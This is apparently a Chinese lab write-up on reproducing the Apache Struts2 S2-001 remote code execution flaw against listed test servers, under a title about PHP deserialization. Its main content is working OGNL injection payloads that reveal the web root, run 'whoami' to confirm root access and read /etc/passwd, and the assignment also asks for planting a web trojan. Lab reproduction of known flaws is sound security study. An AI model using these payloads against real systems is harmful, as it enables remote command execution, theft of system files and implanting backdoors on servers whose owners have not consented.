php反序列化漏洞的复现

php反序列化漏洞的复现

  1. http://159.75.16.25:8066 phpmyadmin scripts/setup.php 反序列化漏洞
    http://159.75.16.25:8065 复现S2-001远程代码执行漏洞
    复现漏洞要求:(1)操作步骤配截图。 

php反序列化漏洞的复现

php反序列化漏洞的复现


(2)并尝试使用S2-001远程代码执行漏洞进行挂马操作 。

php反序列化漏洞的复现

代码被执行由此可见是存在漏洞,可构建payload

php反序列化漏洞的复现

获取tomcat运行路径:

php反序列化漏洞的复现

获取web运行路径

%{
#req=@org.apache.struts2.ServletActionContext@getRequest(),
#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),
#response.println(#req.getRealPath('/')),
#response.flush(),
#response.close()
}

php反序列化漏洞的复现

该用户权限为root

%{
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream(true).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
#f.getWriter().println(new java.lang.String(#e)),
#f.getWriter().flush(),#f.getWriter().close()
}

php反序列化漏洞的复现

%{
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
#f.getWriter().println(new java.lang.String(#e)),
#f.getWriter().flush(),#f.getWriter().close()
}

php反序列化漏洞的复现

                       

点击阅读全文

上一篇 2023年 5月 28日 am10:21
下一篇 2023年 5月 28日 am10:22